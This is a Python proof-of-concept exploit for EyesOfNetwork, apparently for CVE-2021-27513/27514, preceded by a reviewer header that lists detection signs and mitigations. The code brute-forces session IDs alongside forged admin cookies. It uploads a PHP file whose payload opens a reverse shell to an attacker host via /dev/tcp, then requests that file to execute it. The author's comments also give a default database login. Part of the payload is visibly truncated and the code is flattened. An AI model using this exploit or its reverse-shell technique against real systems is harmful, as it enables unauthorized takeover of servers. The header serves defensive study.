# NOTE(review): Proof-of-concept exploit for EyesOfNetwork, CVE-2021-27513 /
# CVE-2021-27514 (as stated in the author's header below). It is kept as a
# reference for what the attack traffic looks like, so the vulnerable
# behaviour can be recognised in logs and the vendor fix verified. It is not
# runnable in this form: the text was flattened onto a few very long lines,
# and the content of the uploaded file appears to have been truncated in
# extraction (the "fileName" form part begins at " /dev/tcp/").
#
# What the script does, step by step (each step is visible in the code):
#   1. Enumerates the numeric "session_id" cookie upward from 100000000 with
#      GET /module/dashboard_view/index.php, sending forged
#      user_name=admin / user_id=1 / user_limitation=0 / group_id=1 cookies
#      alongside it, until a response no longer contains the "alert-info"
#      marker (the loop gives up at 99999999999).
#   2. POSTs a multipart form to /module/admin_itsm/ajax.php
#      (action=add_external_itsm) whose "fileName" part is named
#      shell2.xml.php and whose content refers to LHOST:LPORT.
#   3. After a 6 second pause, GETs
#      /module/admin_itsm/uploaded_file/shell2.xml.php so the server runs
#      the uploaded file.
# TLS certificate verification is disabled on every request (verify=False).
#
# Detection (derived from the requests above): a burst of GETs to
# dashboard_view/index.php from one client whose session_id cookie increases
# by one each time, with "Connection: close"; a POST to admin_itsm/ajax.php
# carrying a filename ending in .php together with action=add_external_itsm;
# any GET under /module/admin_itsm/uploaded_file/ for a .php name.
# Mitigation: apply the vendor fix for the two CVEs; make sure files under
# uploaded_file/ are served as data and never executed by the web server;
# use long, unpredictable session identifiers and invalidate them on logout
# (the author reports 8-10 digit ids that stay valid after login).
# The hard-coded ip / lhost / lport values below are the author's lab
# addresses.
#
# The brute-forcing can take a very long time on a non-production environment because "session_id" is created at every login (but every session_id generated by the app is valid)
# For the PoC I deployed an EyesOfNetwork solution and simulated daily use with 300 logins (on a production environment, I found 230 entries in the "sessions" table in 3 months)
# All session-ids are created with only 8 to 10 DIGITS, so it is easy on a production environment to break one of them...
# For testing usage, change the "sessid" in line 43 to an approximate value of a valid session_id (you find this in your cookie section or in the eonweb database - "sessions_id" table (login:eonweb password:root66 on every instance of eyesofnetwork))
# Note : You can not upload more than 1 file with the same name and the same URL; if the exploit fails, you have to edit the requests with another URL and filename (Original file name:shell2.xml.php original URL:https://ImSo.Famous)
###############################################
# Brute-force session_ID #
# Arbitrary file upload #
# #
# CVE-2021-27513 / CVE-2021-27514 #
# ........... 
# Everything from the author's trailer through the imports, the lab
# configuration (ip / lhost / lport) and the session_id brute-force loop
# follows on a single flattened line. The loop clears the terminal on every
# iteration, prints the id under test, and either increments the id (page
# still shows "alert-info") or reports the id as found and leaves the loop.
# # Exploit is working with V 5.3-10 # # Scripted on 01/13/2021 # # By Ariane.Blow # # https://ariane.agency/ # ############################################### import requests import os import argparse import sys import socket from subprocess import call import time from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) condition="alert-info" ip="192.168.0.36" #Target IP lhost="192.168.0.26" #LHOST IP lport='4445' #LPORT print ("[+] info RHOST= " + ip) print ("[+] info LHOST=" + lhost) print ("[+] info LPORT=" + lport) str(lhost) str(lport) str(ip) sessid=100000000 #sessid=338638100 #for test a=str(sessid) while True: os.system('clear') print ("Start your listener on port " + lport) print ("") print ("") print(" 0") print("/S\ ") print("/ \ That's superman -_-") print ("") a=str(a) str (a) print('\x1b[6;30;42m' + 'KILL-SWITCH : Press Ctrl + c ' + '\x1b[0m') print ("") print ("testing ID " + a) burp0_url = "https://" + ip + ":443/module/dashboard_view/index.php" burp0_cookies = {"session_id": a, "user_name": "admin", "user_id": "1", "user_limitation": "0", "group_id": "1"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0"} req=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False) rep=req if rep.content.find(condition) !=-1: a = int(a) + 1 if int(a) == 99999999999: print("No Session_id available ... ") break else: print ("Yepa !") print("") print('\x1b[6;30;42m' + '[+] session_id FOUND ! 
' + a + '\x1b[0m') print("") break #next step str (a) print ("[-] Sending payload") time.sleep(1) burp0_url = "https://" + ip + ":443/module/admin_itsm/ajax.php" burp0_cookies = {"session_id": a, "user_name": "admin", "user_id": "1", "user_limitation": "0", "group_id": "1"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------25837241963194539690145976400", "Connection": "close", "Referer": "https://" + ip + "/module/admin_itsm/modification_itsm.php"} burp0_data = "-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_url_id\"\r\n\r\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_url\"\r\n\r\nhttps://ImSo.Famous\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"fileName\"; filename=\"shell2.xml.php\"\r\nContent-Type: text/xml\r\n\r\n /dev/tcp/" + lhost + "/" + lport + " 0>&1'\");\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"input_file_name\"\r\n\r\nshell2.xml.php\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_type_request\"\r\n\r\nget\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_parent\"\r\n\r\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_return_champ\"\r\n\r\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nadd_external_itsm\r\n-----------------------------25837241963194539690145976400--\r\n" 
# Upload POST and its result check: the "[+] Payload uploaded" message is
# printed on the basis of a substring search of the response body for "200"
# (not the HTTP status code); the script then sleeps 6 s and issues the GET
# for the uploaded file, reusing the same forged cookies as the brute force.
postreq=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False) rep2=postreq print(rep2) print("") #check OK="200" if rep2.content.find(OK): print('\x1b[6;30;42m' + '[+] Payload uploaded \x1b[0m') print("") else: print("OOPS !") exit() print('\x1b[6;30;42m' + '[+] Start your listener on the good port (' + lport + '), that gonna be epic :)\x1b[0m') print('\x1b[6;30;42m' + '[+] You have ... 6 sec ... AH ! \x1b[0m') print ("") print ("") time.sleep(6) #next step #GET request on the PHP reverse shell print ("[-] Sending Get Request on php RevShell") burp0_url = "https://" + ip + ":443/module/admin_itsm/uploaded_file/shell2.xml.php" burp0_cookies = {"session_id": a, "user_name": "admin", "user_id": "1", "user_limitation": "0", "group_id": "1"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False) print ("[+] Have fun !") print("") print("You can PrivEsc with NMAP ?")